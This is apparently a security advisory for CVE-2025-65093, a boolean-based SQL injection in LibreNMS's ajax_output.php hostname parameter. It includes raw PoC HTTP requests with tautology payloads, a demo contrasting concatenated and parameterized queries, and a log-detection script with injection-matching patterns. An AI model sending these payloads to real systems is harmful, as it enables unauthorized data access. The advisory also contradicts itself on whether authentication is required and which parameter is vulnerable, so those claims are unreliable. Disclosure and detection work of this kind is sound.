
CVE-2025-65093

SQL Injection

CVE-2025-65093: SQL Injection (Boolean-Based) Vulnerability in hostname Parameter on ajax_output.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-65093

Summary

A SQL Injection vulnerability was discovered in the hostname parameter of the ajax_output.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the hostname parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.
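To make the mechanism concrete, the following is an added example (it is not LibreNMS code and does not use its schema): a device lookup is written two ways against an in-memory SQLite table filled with constructed rows, once by concatenating the hostname value into the SQL text and once with a bound parameter. The two payloads are the TRUE and FALSE values from the PoC on this page; the table, column names and function names are assumptions.

```python
import sqlite3

# Constructed sample inventory standing in for a monitoring application's
# devices table (assumed layout, not the real schema).
SAMPLE_DEVICES = [
    (1, "10.0.5.4"),
    (2, "10.0.5.9"),
]

# Boolean payloads taken from the advisory's PoC, URL-decoded: same prefix,
# one always-true tail and one always-false tail.
PAYLOAD_TRUE = "10.0.5.4' AND 1=1 AND '1'='1"
PAYLOAD_FALSE = "10.0.5.4' AND 1=2 AND '1'='1"


def open_db():
    """Create the in-memory table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE devices (device_id INTEGER, hostname TEXT)")
    conn.executemany("INSERT INTO devices VALUES (?, ?)", SAMPLE_DEVICES)
    return conn


def lookup_concatenated(conn, hostname):
    """Hypothetical lookup that splices the parameter into the SQL string.
    This is the pattern the advisory describes, not the application's code."""
    sql = f"SELECT device_id FROM devices WHERE hostname = '{hostname}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, hostname):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    sql = "SELECT device_id FROM devices WHERE hostname = ?"
    return [row[0] for row in conn.execute(sql, (hostname,))]


def compare(conn, lookup):
    """Run the TRUE and FALSE payloads through one lookup and report whether
    the results differ. A difference is the oracle a boolean-based test
    relies on; a parameterized query gives the same (empty) answer to both."""
    true_rows = lookup(conn, PAYLOAD_TRUE)
    false_rows = lookup(conn, PAYLOAD_FALSE)
    return {
        "true_rows": true_rows,
        "false_rows": false_rows,
        "oracle_present": true_rows != false_rows,
    }


if __name__ == "__main__":
    db = open_db()
    print("concatenated :", compare(db, lookup_concatenated))
    print("parameterized:", compare(db, lookup_parameterized))
```

With the concatenated query the TRUE payload returns device 1 and the FALSE payload returns nothing, which is exactly the behavioural difference the PoC observes; with the bound parameter both payloads return nothing because no hostname literally equals the payload string, while a plain `10.0.5.4` still resolves to device 1.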

PoC

Vulnerable Endpoint: ajax_output.php

Parameter: id

  • Authenticate with an administrator account.
    The discovery endpoint /ajax_output.php is accessible only to users with admin-level privileges.
  • Access the following URL with the payload that evaluates to TRUE:

GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=1+AND+'1'='1 HTTP/1.1
Host: 10.0.5.5:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://10.0.5.5:8000/device/3/capture
Cookie: laravel_session=[ADMIN_SESSION_COOKIE]
Priority: u=0

  • Observe that the system returns the expected data and triggers the discovery process.

  • Now repeat the request with a FALSE condition:

GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=2+AND+'1'='1 HTTP/1.1
Host: 10.0.5.5:8000
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://10.0.5.5:8000/device/3/capture
Cookie: laravel_session=[ADMIN_SESSION_COOKIE]
Priority: u=0

  • Observe that the response is altered: no device is found, and no discovery is triggered.

The difference in output confirms that the injected Boolean logic is being executed by the database.
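From the defender's side, the TRUE/FALSE probing pattern above is visible in the web server's access log. The following is an added example (not part of the advisory or of LibreNMS) that parses combined-format log lines, decodes each query parameter, flags values carrying a boolean tautology after a quote, and then groups flagged requests by source, path and parameter so that two differing payloads against the same parameter, with different response sizes, surface as one probing event. The log lines are constructed to mirror the two PoC requests; the regexes and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
# Lines 2 and 3 mirror the two PoC requests; note the differing response sizes.
SAMPLE_LOG = """\
10.0.5.4 - - [01/Jan/2025:10:00:01 +0000] "GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4 HTTP/1.1" 200 512
10.0.5.4 - - [01/Jan/2025:10:00:05 +0000] "GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=1+AND+'1'='1 HTTP/1.1" 200 512
10.0.5.4 - - [01/Jan/2025:10:00:09 +0000] "GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=2+AND+'1'='1 HTTP/1.1" 200 37
10.0.5.7 - - [01/Jan/2025:10:01:00 +0000] "GET /device/3/capture HTTP/1.1" 200 2048
"""

# Combined log format: client, identity, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)

# A quote that closes a string literal, then AND/OR, then a numeric or quoted
# comparison: the shape of a boolean tautology such as ' AND 1=1 / ' AND 1=2.
BOOL_RE = re.compile(
    r"""['"]\s*(and|or)\s+(\d+|'[^']*')\s*=\s*(\d+|'[^']*')""", re.IGNORECASE
)


def parse_line(line):
    """Split one log line into fields and decode its query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs decodes %xx escapes and turns '+' into spaces for us.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_boolean_injection(log_text):
    """Return one finding per query parameter value that matches BOOL_RE."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                if BOOL_RE.search(value):
                    findings.append({
                        "ip": rec["ip"], "path": rec["path"], "param": name,
                        "value": value, "status": rec["status"],
                        "size": int(rec["size"]),
                    })
    return findings


def probe_pairs(findings):
    """Group findings by (source, path, parameter). Two or more distinct
    payloads against one parameter from one source is the TRUE/FALSE probing
    pattern; differing response sizes are the oracle the probe is reading."""
    groups = {}
    for f in findings:
        groups.setdefault((f["ip"], f["path"], f["param"]), []).append(f)
    pairs = []
    for (ip, path, param), items in groups.items():
        payloads = {i["value"] for i in items}
        if len(payloads) >= 2:
            pairs.append({
                "ip": ip, "path": path, "param": param,
                "payloads": len(payloads),
                "response_sizes": sorted({i["size"] for i in items}),
            })
    return pairs


if __name__ == "__main__":
    hits = find_boolean_injection(SAMPLE_LOG)
    for h in hits:
        print("flagged:", h)
    for p in probe_pairs(hits):
        print("probe pair:", p)
```

On the sample, the two PoC requests are flagged on the `hostname` parameter and collapse into one probe pair whose response sizes are 37 and 512; the benign first request and the unrelated page view produce nothing. In a real deployment the same grouping can be run per session cookie or per authenticated user instead of per source IP, which matches how the endpoint is reached in the PoC.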

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9

Finder

Marcelo Queiroz

By: CVE-Hunters
